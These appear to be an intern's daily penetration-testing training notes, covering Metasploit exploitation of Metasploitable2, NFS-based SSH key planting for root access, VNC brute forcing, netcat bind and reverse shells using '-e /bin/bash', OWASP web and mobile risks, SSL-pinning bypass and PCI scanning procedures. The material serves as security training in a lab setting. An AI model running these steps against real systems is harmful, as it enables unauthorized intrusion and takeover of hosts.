QRC TRAINING

05 May 2021
VA/PT 10:00 AM

TOPICS

Vulnerability Assessment

1. Static and Dynamic Testing.

2. Conduct Vulnerability Assessment first. (Target is Metasploitable2
192.168.1.74)
3. Nmap commands
● nmap -sV -sC -A -p- 192.168.1.74 (use -sC for default scripts during
enumeration)
● -A is used for Aggressive mode. To bypass IDS and IPS systems.
● nmap --script firewall-bypass --script-args
firewall-bypass.helper=’ftp’, firewall-bypass.targetport=22 <target>
● Use OpenCherry to list the enumeration findings. To be used later in
Reporting.

Nessus Steps

1. Start Nessus
2. Go to https:localhost:8834.
3. Complete registration on first install. Else login.
4. Select Advanced Scan
5. Name the scan. Specify target - 192.168.29.121
6. Go to Plugins -> Disable “Denial of Service” plugin.
7. Go to Settings -> Discovery -> Host Discovery -> Ping the remote host -
ON.
8. Save and Run the Scan.

NOTES
 ● Linux command “apropos sample” - Gives list of all commands related to
sample

HOME TASKS
1. Walkthrough of VulnHub machine Metasploitable2 (192.168.1.74).
2. Go through the vulnerability list exported from Nessus for 192.168.1.74.
3. Learn linux basics and commands.
06 May 2021
VA/PT !0:00 AM - 12:30 PM, 3:30 PM - 6:00 PM

TOPICS

Penetration Testing

1. Conduct Vulnerability Assessment first. (Target is Metasploitable2

192.168.1.74) (Exploiting Port 21 FTP; service → vsftpd 2.3.4)
2. Start Metasploit using command msfconsole
3. Command “search vsftpd” to see a list of exploits.
4. Select exploit using “use 0” or “use name_of_exploit”
5. Command “set rhosts 192.168.1.74” to select target.
6. Command “set lhosts 192.168.1.4” to set the localhost if not done. This
is not required.
7. Use “show payloads” to see a list of applicable payloads.
8. Select payload using “use 0” or “use name_of_payload”
9. Command “edit” to see the exploit code.
10.Start exploit by using the command “exploit” or “run”.
11.We should get “meterpreter > shell” upon successful execution of the
exploit.
12.Use ifconfig to verify if you have access to the target device.

Report to Client

1. Insecure Port 21.

2. Version Disclosure: Upgrade vsftpd 2.3.4 to latest version.
3. Default login is enabled.
4. Out-of-date vsftpd
5. Privilege Escalation using CVE-2011-2523
a. Instance 1 - metasploit
b. Instance 2 - github exploit
NOTES
● Linux command “apropos sample” - Gives list of all commands related to
sample
● Download CherryTree app for creating notes/reports.
● Use command “searchsploit vsftpd” to find an offline copy of exploit-db
database. This is used when we don’t have internet access.
● “Searchsploit -x 17491”. This command searches exploit-db for the
vulnerability number 17491.

HOME TASKS
1. Enumerate Metasploitable2 and find other exploits.
07 May 2021
VA/PT !0:00 AM

TOPICS

VAPT (Continuing with Metasploitable2)

1. “Python -m SimpleHTTPServer 8889”. This creates an http server on our

kali local host. Upload any file on the server. Download the file using
“wget fileurl”
2. FileTransfer using Netcat:
Receiver: “nc -l -p 1234”
Sender: “nc -w 15 192.168.29.121 1234 < /home/kali/Documents/test.txt”
(15 is the timeout seconds. 1234 is the port opened)
3. Dirb - web content scanner. To look for directories and files on the
target that might have valuable info. Command “dirb
http://192.168.29.121” [GUI version is called Dirbuster tp brute force
login pages]
4. “Nikto -h http://192.168.29.121:80” Vulnerability scanner for websites.
5. ClickJacking: An attack that performs a malicious activity when a user
clicks on a particular frame on a website. This malicious activity might
include stealing user credentials, session ID, etc.
6. NFS: Network File System. Port 2049.
7. Reverse shell using NFS: [Creating new ssh keys and using it to login]
- Nmap -sv 192.168.29.121 -p 2049
- showmount -e 192.168.29.121 [See available mounts → / in this case]
- Mkdir /test
- Sudo mount -t nfs 192.168.29.121:/ /home/kali/test [Mount the target /
directory to our folder]
- Df -k [Disk Free command to see details of the disks]
- cd /home/kali/test
- ls -al [Lists files and shows detailed information]
- cd /home/kali/test/root
- ls -al [shows .ssh amongst other folders]
 - Ssh-keygen [Command to create ssh key pair. Enter new password if wanted
or leave blank]
- ls -al [shows authorized_keys file and the newly created test-ssh-auth]
- Cat test-ssh-auth.pub [Creates new private key]
- Vi authorized_keys [edit this file and put the new keys from
test-ssh-auth.pub file]
- Ssh -i test-ssh-auth [email protected] [Try to connect to target via
ssh reverse shell. Enter password from earlier step]
- You should see the root@metasploitable:~#
8. “Enum4linux” - Enumeration Tool to find data, directories, mounts on
target.
9. 5900/tcp VNC (protocol 3.3)
- msf6> search vnc [gets a list of modules]
- Select auxiliary/scanner/vnc/vnc_login
- Set RHOSTS 192.168.29.121
- run/exploit ----> Gives you Login Successful with : :password. (no
username; password: password)
10.Using Hydra [Login Cracker]
- Hydra -l user -P passlist.txt 192.168.29.121 vnc
11.Since we have the password, we can connect using VNCviewer by following
command:
- Vncviewer 192.168.29.121 [Gives root@metasploitable:/# access via GUI]

NOTES
● Auxiliary and Exploit - Auxiliary usually covers fingerprinting and has
scanning capabilities. It doesn't not require a payload. Exploits use
payloads. Any module that is not an Exploit is an Auxiliary.

● PT methodology: VA using Nessus/Qualys and try to exploit the

vulnerabilities found; network, service and version enumeration: host
discovery, ports, services, etc. Find vulnerabilities and try to exploit
them. Look for Business logic (Internal apps) and check vulnerabilities.
Then conclude with a report and share with the client.

● Mass Assignment : Mass assignment vulnerability occurs when a user is

able to initialize or overwrite server-side variables for which are not
intended by the application. By manually crafting a request to include
 additional parameters in a request, a malicious user may adversely
affect application functionality.

● Rpcclient: to be discussed

REFERENCE LINKS

https://www.offensive-security.com/metasploit-unleashed/scanner-telnet-auxilia
ry-modules/
https://resources.infosecinstitute.com/topic/exploiting-nfs-share/
https://salt.security/blog/api6-2019-mass-assignment

HOME TASKS
1. Practise VAPT on Metasploitable 2 remaining ports after VNC.
2. Fill VAPT Report.
3. OWASP Top 10.
4. Research rpcclient.
 10 May 2021
VA/PT 10:00 AM

TOPICS

VAPT

1. Continue VAPT of Metasploitable2 and create the report.

NOTES
● CeWL (Custom Word List Generator) - Tool that relies on web crawlers for
a specific url and tries to generate a word list for usernames and
passwords. This wordlist can be then used with other brute force
attacks.

● Bind and Reverse Shell

SHell Type Bob (192.168.1.10) Alice (192.168.1.20)

BIND Shell 💀
(root kali)-[/home/kali]
# ncat -nvlp 4444 -e /bin/bash
root@metasploitable#
nc 192.168.1.10 4444
Ncat: Version 7.91 ( https://nmap.org/ncat [will get Bob’s shell
) here]
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 192.168.1.20.
Ncat: Connection from 192.168.1.20:40294.
[Listener]

Reverse
Shell
💀
(root kali)-[/home/kali]
# ncat -nv 192.168.29.121 4444 -e
root@metasploitable#
nc -nvlp 4444 [Listener]
/bin/bash [Will get Bob’s shell
1 ⨯ here]
Ncat: Version 7.91 (https://nmap.org/ncat)
Ncat: Connected to 192.168.1.20:4444.
● Linux Commands
- /bin: basic programs (ls, cd, cat, etc.)
- /sbin: system programs (fdisk, mkfs, sysctl, etc)
- usr/bin: applications (apt, ncat, nmap, etc.)
- usr/sbin: applications for system admin.
- usr/share: application support and data files
- /tmp: temporary files (typically deleted on boot)
- /etc: configuration files
- man -k passwd: Manual command
- Apropos: used when you don’t remember a command
- Pwd: present working directory
- Cd~ : [~ is Tilde. Used to go to Home directory]
- Which: used to find program path
- Locate: locates all results of the executable. Need to use
“updatedb” before to update the database.
- Find: searches and lists files/directories based on argument
- Systemctl: controls the systemd system and service
- List-unit-files: lists the services
- History: shows history of used commands. To select: !2045
- Reverse-i-search: Press Ctrl+R and keyword to get related commands
from history.
- Redirection: echo ls-la > test.txt [puts the text “ls-la” in txt
file].
- ls -al > test.txt : [Stores output of command ls -al into
test.txt]
- Wc: Word Count. Counts the number of lines, words, characters,
bytes, etc.
- Sed: Stream Editor for insertion, deletion, find and replace.
Refer link below.
- Cut: To cut sections from file using range or delimiters and
display the output. Refer link below.
- Awk: manipulating data and generating reports. Refer link.
- Curl:

● Processes Commands
- Ps: Lists current user’s background processes with ID.
- Kill <process ID>: To kill Process.
- Pkill: Kill specific processes.
 - Run process in background: Put & at the end of command. OR press
Ctrl+Z while the process is running.

● POP vs IMAP: POP downloads email from server on single device. Does Not
store on Server. Internet access is needed only for receiving and
sending emails. IMAP is used to access email from multiple devices.
Syncs folder with server and other devices.

● CVSS 3.0 (to be discussed)

● Rpcclient

● OWASP top 10

● Nishang : framework and collection of scripts and payloads which enables

usage of PowerShell for offensive security and post exploitation during
Penetration Tests.

REFERENCE LINKS

https://www.ssh.com/academy/ssh/public-key-authentication
https://upcloud.com/community/tutorials/use-ssh-keys-authentication/
https://medium.com/@PenTest_duck/bind-vs-reverse-vs-encrypted-shells-what-shou
ld-you-use-6ead1d947aa9
https://www.geeksforgeeks.org/sed-command-in-linux-unix-with-examples/
https://www.geeksforgeeks.org/cut-command-linux-examples/
https://www.geeksforgeeks.org/awk-command-unixlinux-examples/
https://www.first.org/cvss/calculator/3.1
https://www.hackingarticles.in/active-directory-enumeration-rpcclient/
https://www.thegeekstuff.com/2010/09/linux-file-system-structure/

HOME TASKS
1. Use Vi command to search words in a text file.
2. Bash Script to find all subdomains of microsoft.com
11 May 2021
VA/PT 10:00 AM

TOPICS

Real World VA/PT

1. Use Nessus report to get a list of vulnerabilities.

2. Use Nmap scripts for enumeration.
3. Compare Nessus and Nmap findings.
4. Search for additional information on the vulnerabilities and record the
findings.
5. Use tools like netcat, telnet, msfconsole, running scripts, etc. to
perform PT.

Types of Injection

1. SQL

I. In-Band

a. Error-based
b. Union-based

II. Inferential-Band

a. Boolean-based
b. Time-based

III. Out-of-Band

2. TLS Handshake

NOTES
HOME TASKS
1. Continue VAPT for Metasploitable 2 from Nessus and Nmap.

2. API Top 10

3. Mobile Top 10

4. OWASP Top 10
12 May 2021
VA/PT 10:00 AM

TOPICS

Types of Injection

1. SQL injection - A web security vulnerability that allows an attacker to

interfere with the queries that an application makes to its database.

I. In-Band - Attacker is able to use the same communication channel to

both launch the attack and gather results.

a. Error-based - Technique that relies on error messages thrown by

the database server to obtain information about the structure of
the database.
b. Union-based - Technique that leverages the UNION SQL operator to
combine the results of two or more SELECT statements into a single
result which is then returned as part of the HTTP response.
 II. Inferential-Band - No data is actually transferred via the web
application and the attacker would not be able to see the result of an
attack in-band (which is why such attacks are commonly referred to as
“blind SQL Injection attacks”). Instead, an attacker is able to
reconstruct the database structure by sending payloads, observing the
web application’s response and the resulting behavior of the database
server.

c. Boolean-based
d. Time-based

III. Out-of-Band

2. Code Injection- SQL injection is a web security vulnerability that

allows an attacker to interfere with the queries that an application
makes to its database.
3. Command Injection - An attack in which the goal is the execution of
arbitrary commands on the host operating system via a vulnerable
application. Command injection attacks are possible when an application
passes unsafe user-supplied data (forms, cookies, HTTP headers, etc.) to
a system shell.

SQL Injection Preventive Measures

1. Parameterized Queries
2. Stored Procedures
3. Input Validation

Burpsuite

1. Run OWASP Top 10 on http://122.170.5.106:33441/Intern-project/

NOTES

REFERENCE LINKS

https://www.ssh.com/academy/ssh/public-key-authentication
13 May 2021
VA/PT 10:00 AM

TOPICS

OWASP TOP 10

Run OWASP Top 10 on http://122.170.5.106:33441/Intern-project/

HOME TASKS

REFERENCE LINKS
https://portswigger.net/web-security/cross-site-scripting/dom-based
https://medium.com/@shatabda/security-xpath-injection-what-how-3162a0d4033b
17 May 2021
Web App VA/PT 10:00 AM

TOPICS

OWASP TOP 10

1. XSS:
a. DOM-based XSS - vulnerabilities usually arise when JavaScript takes data
from an attacker-controllable source, such as the URL, and passes it to
a sink that supports dynamic code execution.
b. Reflected XSS - arises when an application receives data in an HTTP
request and includes that data within the immediate response in an
unsafe way.
c. Stored XSS - arises when an application receives data from an untrusted
source and includes that data within its later HTTP responses in an
unsafe way.
2. XPath Injection:

The data stored in XML can be queried via XPath which is similar to SQL
conceptually. XPath injection is a type of attack where a malicious
input can lead to unauthorised access or exposure of sensitive
information such as the structure and content of an XML document. It
occurs when the user's input is used in the construction of the query
string.

3. LDAP Injection:
4. Host Header Injection:
5. Broken Authentication:
6. Sensitive Data Exposure:
7. XML External Entity (XXE):
8. Insecure Deserialization: (Tool - Ysoserial)
9. Insufficient Logging & Monitoring
 NETSPARKER

1. Windows based Tool for Web Application Vulnerability Scanning.

2. Linux/MacOS,Win Tool → Acunetix

NOTES
● Type of Auth: Oauth, Basic, API, JWT.
● Tool for Web App VA - NetSparker, Acunetix.
● NTLM/Kerberos

HOME TASKS
1. Session Fixation & Session Hijacking
2. OWASP Top 10 go through.
3. Acunetix install and run scan.

REFERENCE LINKS
● https://portswigger.net/web-security/cross-site-scripting/dom-based
● https://medium.com/@shatabda/security-xpath-injection-what-how-3162a0d4033b
● https://jwt.io/introduction
 18 May 2021
Web App VA/PT 10:20 AM

TOPICS

OWASP TOP 10 (contd.)

1. Session Hijacking/Fixation
2. Owasp top 10 Checklist
a. Robots.txt
b. WebDav: If webdav is enabled, then we can use the command “Davtest
--url http:10.0.0.1” to test what type of file uploading works.
Then use curl to upload files. Search inurl: *./webdav to find a
list of websites where webdav is enabled.
3. HTTP HEAD Allow

Check which methods are allowed: By examining the HTTP header and
checking the “Allow:” section.

4. Autorepeater and Authorize tools in Burp suite

HOME TASKS
1. How does the Access Control Bypass work using the Http Head method only?
2. OWASPv4 Checklist for 122.170.5.106:33441

REFERENCE LINKS

● https://owasp.org/www-project-web-security-testing-guide/v42/
19 May 2021
Web App VA/PT 10:20 AM

TOPICS

OWASP TOP 10 v4 Checklist(contd.)

1. Registration
- User enumeration
- Stored XSS (username)
- Unrestricted file upload
- Reflected XSS (username)
2. User enumeration
3. SQL error
4. SQL injection
5. Improper error handling
6. Add Book
- XSS
- Unrestricted file upload
- SQL injection
7.

HOME TASKS
1. Continue Owasp top 10 v4 checklist.
2. Continue PT of Web App.

REFERENCE LINKS
20 May 2021
Web App VA/PT 10:20 AM

TOPICS

OWASP TOP 10 v4 Checklist(contd.)

- Discussion of Web app va/pt.

-

HOME TASKS
1. Continue VA/PT and upload CherryTree report.

REFERENCE LINKS
21 May 2021
Web App PT & Project Management 10:00 AM

TOPICS

OWASP TOP 10

Discussion on vulnerabilities of http://122.170.5.106:33441/Intern-project/

Project Management

SecOps department:

- Has 3 teams (purple, blue, black) and the 4th is the Red team.
- Has Team Lead and Team Members

New Projects:

1. PMO - Smita Ma’am

2. VAPT Manager → Assigned to Teams

ASV Scanning for PCI clients (using Qualys tool)

Company Scope (Segmentation):

1. PCI in-scope CDE Cardholder Data Environment

2. PCI in-scope Non CDE (Managing systems with cardholder data)
3. Out-of-Scope (Shouldn’t have access to CDE)
(ping, telnet, tracert, nmap used to verify connectivity is failing with
CDE.) (VLAN Segmentation PT) (Check for unauthorized access between
in-scope CDE and out-of-scope) (out-of-scope to Non CDE always exists)

Documentation:

1. Security Operations Activity Tracking Sheet

2. Activity Planner
3. Account Managers List
4. Client Activity Tracker (Contains Combined overall report and individual
reports for each client) (Activity Notes/Logs are maintained)
5. CERT-IN Report Tracker
 6. Monthly MIS (Management Info Systems) Report
7. Quarterly User MIS (contains individual Team member’s work logs)
8. CERT-IN empanelled vendor Report

Scans:

1. ASV scan every quarter.

2. PCI external and internal scan → yearly.
3. Non PCI external and internal → as per client’s requirements.
4. Segmentation PT (Standard Requirements → merchants - yearly; service
provider - 6 monthly)
5. Web App/ Mobile/ Code Review (PCI - yearly or as per client’s
organizational policies)

Initial Certification (1st time PCI certification)

1. Perform all scans Once.

- ASV
- Internal scan (vulnerability)
- Internal/External PT
2. Reports on all above scans.
3. QSA final audit.
4. AOC (Attestation of Compliance), ROC (Report on Compliance) and others.
5. COC Certification of Compliance - Initial PCI-DSS certification done.
6. Maintenance/Renewal period (12 months):
- ASV or internal VA quarterly
- Other scans yearly (internal/external PT, Web App/ Mobile scans)
- All vulnerabilities have to be closed in the same quarter.
- Risk mitigation document (for documenting vulnerabilities that are
not closed and its reasons).

Starting steps:

1. Define Scope (Requirements)

2. Get Connectivity. Whitelist our IP.
3. Get a Test system to install scanners and tools.
4. Run scans from the Test system to the target network.
5. Reporting
6. Regular Follow Up
7. Remediation
 8. Revalidation and Final Report.
9. Send Activity Closure Email.

Postman

1. Add/Import API to collection

2. Set Proxy from Settings.
3. Disable SSL Certificate Verification.

HOME TASKS
1. SSRF
2. SQLMap

REFERENCE LINKS

● https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-aut
horization
● https://github.com/inonshk/31-days-of-API-Security-Tips
● https://mobisec.reyammer.io/slides
● https://application.security/free/owasp-top-10
● https://developers.facebook.com/docs/whatsapp/guides/postman/
 24 May 2021
Web App VA/PT & Mobile 10:30 AM

TOPICS

CSRF vs SSRF (discussion)

OWASP API Top 10

- https://owasp.org/www-project-api-security/
- https://apisecurity.io/encyclopedia/content/owasp/owasp-api-security-top
-10.htm

OWASP Mobile Top 10

M1: Improper Platform Usage

M2: Insecure Data Storage

M3: Insecure Communication

M4: Insecure Authentication

M5: Insufficient Cryptography

M6: Insecure Authorization

M7: Poor Code Quality

M8: Code Tampering

M9: Reverse Engineering

M10: Extraneous Functionality

NOTES
1. DB Database Tool (SQLite) to view databases. (https://sqlitebrowser.org/)
2. FRIDA - To bypass SSL Pinning
3. Android apps:
a. Xposed installer
b. RootCloak - (Hides from the apps that device is rooted)
 c. SSLUnpinning 2.0 - (Unpin selected apps from SSl certificate)
4. Use Smali code to edit if the java cannot be edited. Find true/false in java
code and find the respective 0x1(true) 0x0(false) values in Smali code and
change them as required.
5. Find process log using adb (use “findstr” instead of “grep” in windows)
a. adb shell ps | grep com.c*
b. → gives process id → 3897
c. adb logcat | grep 3897

HOME TASKS
1. How to recompile an APK along with signing after making changes.
2. FRIDA

REFERENCE LINKS
● https://portswigger.net/web-security/ssrf
● https://github.com/OWASP/owasp-mstg/blob/master/Checklists/Mobile_App_Security
_Checklist-English_1.2.xlsx
● https://owasp.org/www-project-mobile-top-10/
● https://www.appsealing.com/owasp-mobile-top-10-a-comprehensive-guide-for-mobil
e-developers-to-counter-risks/
● https://androidtamer.com/learn_android_security
● https://medium.com/swlh/defeating-android-root-detection-with-smali-patching-4
6c082c27a81
24 May 2021
Mobile Testing 10:00 AM

TOPICS

Mobile Testing Basics

1. Tools
- Genymotion (Android Emulator)
- MobSF (Automated testing for Mobile Apps)
- Android Tamer (All-in-one VM for Mobile testing)
- Android Debug Bridge (ADB) (For shell access to Android device)
- DB Database SQLite
- Android tools
● Xposed installer
● RootCloak (Hides from the apps that device is rooted)
● SSL Unpinning 2.0
2. Using GenyMotion
3. Using MobSF

HOME TASKS
1. Install discussed tools: Genymotion, MobSF
2. Study Mobile App basics on MobiSec link below.
3. Practise Testing using DIVA (Damn Insecure and Vulnerable Application)
(Available on AndroidTamer site)

REFERENCE LINKS
https://mobisec.reyammer.io/slides

https://developer.android.com/guide/components/fundamentals
25 May 2021
Mobile Testing 10:30 AM

TOPICS

Mobile Testing Basics (contd.)

1. Mobile Testing
- Static
- Dynamic
2. Using MobSF for Static and Dynamic Testing.
3. Discussion on Concepts covered from MobiSec link.

SSL Unpinning

- https://infosecwriteups.com/hail-frida-the-universal-ssl-pinning-bypass-
for-android-e9e1d733d29

HOME TASKS
1. SSL Unpinning using Frida
2. Practise Testing using DIVA (Damn Insecure and Vulnerable Application)
(Available on AndroidTamer site)

REFERENCE LINKS
https://mobisec.reyammer.io/slides
26 May 2021
Mobile Testing 10:30 AM

TOPICS

Mobile Testing Discussion (contd.)

1. MobSF dynamic scan demo

2. Installation issues discussion.

Qualys

1. Scanning products and services

2. QualysGuard → ASV compliance Tool (used by QRC)
3. 3 Datacenters (US, Europe, India→ Pune)
4. QRC uses India platform of Qualys
5. Qualys → VA scans → VA results sharing with client → scan reports attested.
6. Modules: (Consultant Portal)
a. Infrastructure Security
- Vulnerability management
- Threat Protection
b. IT Operations
- AssetView
c. Compliance
- Policy Compliance
- PCI Compliance
d. Application Security
- Web Application Scanning
- Web Malware Detection
7. PCI Merchant portal:

- Customer specific. Managed internally.

- Manage Scans, send PCI scan to merchant report, send report to
Qualys team for attestation from merchant portal, share attested
report with the customer.
8. Qualys does non intrusive scans. (Non DOS. Non disruptive)
9. Qualys scan’s scope includes public facing systems like web servers.
Database servers storing PCI information are a part of the internal network
(private and not public facing) and are not included in these ASV scans.
10. Quays will take about 1 working day for the report attestation process.
11. PCI requirement 6 → Develop and maintain secure systems and applications
12. PCI requirement 11 → Test security systems and processes regularly.

Configuration Audit

1. Nessus offline config audit.

TLS Handshake

HOME TASKS

REFERENCE LINKS
● https://www.hackingarticles.in/android-pentest-automated-analysis-using-
mobsf/
● https://www.qualys.com/training/#instructor-led
● https://www.pcisecuritystandards.org/